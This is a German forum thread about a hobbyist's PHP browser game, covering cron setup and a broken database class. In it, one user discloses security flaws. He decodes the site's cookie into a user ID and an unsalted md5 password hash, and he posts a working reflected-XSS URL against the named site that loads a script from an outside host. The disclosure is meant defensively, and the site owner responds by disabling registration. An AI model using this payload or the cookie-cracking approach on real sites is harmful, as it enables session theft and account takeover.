Willkommen ~Gast!
Registrieren || Einloggen || Hilfe/FAQ || Staff
Probleme mit der Registrierung im Forum? Melde dich unter registerEin Bild.
Autor Beitrag
025
26.10.2010, 01:25
speziFanta



Sorry, ich meinte deinen Cronjobeintrag. (crontab -e)

Edit:

Empfehle: http://de.php.net/manual/en/function.mysql-connect.php

Quellcode:$this->login = array(
'localhost' => $server,
'stfc' => $database,
'admin' => $user,
'xxxxxx'=> $password
);
Ggf. auch noch mal den Teil über Arrays. Hast du ein PHP Buch zur Hand? -> _Lesen_

--

Heute schon gegoogelt?
spezi|Clan
TheWall.de - wo jeder alles sein kann.


Dieser Beitrag wurde am 26.10.2010 um 02:02 von speziFanta bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche
026
26.10.2010, 01:30
LeJean



Ich nehm's mal mit auf die neue Seite rüber:
Quellcode:// ########################################################################################
// ########################################################################################
// SQL-Abstraktions-Klasse


class sql {
var $login = array();
var $error = array();

var $link_id = 0;
var $query_id = 0;

var $i_query = 0;

var $already_reconnected = -1; // So ist bei erster Verbindung 0


function sql($server, $database, $user, $password = '') {
  $this->login = array(
    'localhost' => $server,
    'stfc' => $database,
    'admin' => $user,
    'xxxxxx'=> $password
  );
}

Was soll das Skript machen? Und was ist das bitte für eine Zuweisung da unten? Die Datenbank soll 'stfc' heißen, aber das ist der Name des Schlüssels! Und dein Passwort stand offensichtlich auch als Array-Schlüssel drin! Ich bezweifle, dass das so gewollt ist, von der Person, die diese Klasse geschrieben hat!
Und du möchtest eine Klassendefinition als Cron ausführen? o_O

Vielleicht solltest du dich erstmal mit den Grundlagen beschäftigen, bevor du das da umsetzen willst.

Übrigens, grad festgestellt, dass du besser die Finger von dem Code und dem ganzen System lassen solltest:

Der Cookie enthält user-id und password (fast) im Klartext.
Quellcode:YToyOntzOjc6InVzZXJfaWQiO3M6MjoiMTEiO3M6MTM6InVzZXJfcGFzc3dvcmQiO3M6MzI6IjA5OGY2YmNkNDYyMWQzNzNjYWRlNGU4MzI2MjdiNGY2Ijt9 Wenn ich den base64-decode, finde ich
Quellcode:a:2:{s:7:"user_id";s:2:"11";s:13:"user_password";s:32:"098f6bcd4621d373cade4e832627b4f6";} Das ist eindeutig ein PHP-Array. Deserialisiert sieht das dann so aus
Quellcode:array (
  'user_id' => '11',
  'user_password' => '098f6bcd4621d373cade4e832627b4f6',
)
Und wer jetzt nicht völlig auf den Kopf gefallen ist, der findet schnell raus, dass der Hash für 'user_password' nur md5 ist und hier 'test' bedeutet.

Diese Erkenntnis gemischt mit diesem Link
Quellcode:http://st-gb.de/game/index.php?a=settings&view=gallery&mesg=%3Cscript%20src=http%3A%2F%2Fha.ckers.org%2Fxss.js%3E
ist eine ZIEMLICH ungünstige Mischung.

--


Dieser Beitrag wurde am 26.10.2010 um 04:23 von LeJean bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche
027
26.10.2010, 06:07
speziFanta



Quellcode:Bluthund> if(isset($_GET['sql_debug'])) $db->debug_info(); ++

--

Heute schon gegoogelt?
spezi|Clan
TheWall.de - wo jeder alles sein kann.

zum Seitenanfang zum Seitenende Profil || Suche
028
26.10.2010, 14:22
Agamemnon-Hellmapper



@LeJean: Bwahahahaha

Aber kannst du mir Hobbyinformatiker bitte folgendes plausibel machen:
"der findet schnell raus, dass der Hash [...] nur md5 ist und hier 'test' bedeutet"

Ich seh an dem Zahlenstring grad mal, dass es Hex ist, sonst nix.

--

Es gibt 2 Möglichkeiten, eine Kristallkugel zu benutzen:
a) um damit Spekulationen über ein Problem eines Users zu machen und
b) um sie einem besonders unkooperativen User über den Schädel zu ziehen.
- bloggt jetzt auch selbst auf Sclavia.de

zum Seitenanfang zum Seitenende Profil || Suche
029
26.10.2010, 14:36
Fox Mulder



Zitat:
speziFanta postete
Wie sieht denn der Eintrag aus?
der Eintrag ist doch eigendlich egal da ich den befehl eh per putty ausführe?

php5 stfc-scheduler/main.php

edit: ich verstehe natürlich nicht gerade viel von php hab bis jetzt alles in eigenregie aufgezogen, aber deswegen suche ich ja "mitmischer/Mitarbeiter" die lust haben an einem Funprojekt zu arbeiten, der grösste teil sprich das umarbeiten von ST auf SW bleibt natürlich bei mir und dem Balancing Team was ich auch gut alleine schaffe wil ich mittlerweile die orte für 90% aller werte gefunden haben dürfte.

--

...


Dieser Beitrag wurde am 26.10.2010 um 14:49 von Fox Mulder bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche
030
26.10.2010, 14:47
LeJean



Ohne Passwortvorgaben (Sonderzeichen, Groß- und Kleinschreibung, Zahlen) und ohne Salt ist md5 unsicher... gibt verschiedene "Nachschlagewerke" für reverse Suchen.

Fox Mulder: Das ist echt kein Spaß, du solltest ernst nehmen, was ich da oben geschrieben hab. Damit ist jedes Skriptkiddie in der Lage, einem beliebigen Benutzer mit einem einfachen Link den Cookie zu klauen und dessen Credentials auszulesen!

Ich kann leider oben nicht mehr editieren: Es passiert nichts böses, wenn man den Link mal ausprobiert. Aber es zeigt, dass dein System Lücken hat!

--


Dieser Beitrag wurde am 26.10.2010 um 14:54 von LeJean bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche
031
26.10.2010, 14:57
Fox Mulder



Zitat:
LeJean postete
Ohne Passwortvorgaben (Sonderzeichen, Groß- und Kleinschreibung, Zahlen) und ohne Salt ist md5 unsicher... gibt verschiedene "Nachschlagewerke" für reverse Suchen.

Fox Mulder: Das ist echt kein Spaß, du solltest ernst nehmen, was ich da oben geschrieben hab. Damit ist jedes Skriptkiddie in der Lage, einem beliebigen Benutzer mit einem einfachen Link den Cookie zu klauen und dessen Credentials auszulesen!

Ich kann leider oben nicht mehr editieren: Es passiert nichts böses, wenn man den Link mal ausprobiert. Aber es zeigt, dass dein System Lücken hat!

jupp Danke wenn alles läuft wird man sich wohl darüber gedanken machen müssen die Sicherheitslücken zu schliessen damit sich das keiner zu schaffen mache :)

--

...

zum Seitenanfang zum Seitenende Profil || Suche
032
26.10.2010, 17:35
speziFanta



Würdest du die Page offline nehmen, selbst wenn es dir drei Informatiker nahe lägen?

Hm. Ist das die ganze Zeile? Kein "5 0 * * *" (kann abweichen) das dort vorangestellt ist?

Wenn du crontab -e ausführst dann müsste die Zeile in etwa aussehen:
Quellcode:0 0 * * * php5 /var/www/vhosts/st-gb.de/httpdocs/stfc-scheduler/main.php
Den genauen Pfad müsstest du halt raussuchen und angeben. Aber so würde das Script dann um Punkt Mitternacht einmal ausgeführt werden.

Btw. einen kleinen Bug gefunden:
Wollte gerade ein Image in die Gallery laden und da kam ein Fehler wegen falscher Benutzerrechte. Das $uploaddir in Zeile 34 in der game/modules/settings.php sei falsch gesetzt. Da wird wahrscheinlich auch soetwas wie $uploaddir = /var/www/vhosts/st-gb.de/httpdocs/game/gallery/ hinmüssen.

--

Heute schon gegoogelt?
spezi|Clan
TheWall.de - wo jeder alles sein kann.


Dieser Beitrag wurde am 26.10.2010 um 17:39 von speziFanta bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche
033
26.10.2010, 17:52
Fox Mulder



11,26,41,56 * * * * /opt/psa/admin/sbin/backupmng >

wir bei crontab -e angezeigt, obwohl im control panel folgendes eingebaut ist

Zitat:
Würdest du die Page offline nehmen, selbst wenn es dir drei Informatiker nahe lägen?
ich werde wohl erstmal das registrieren deaktivieren damit niemand schmu damit treiben kann.

edit: registrierung deaktiviert.

--

...


Dieser Beitrag wurde am 26.10.2010 um 17:55 von Fox Mulder bearbeitet.
zum Seitenanfang zum Seitenende Profil || Suche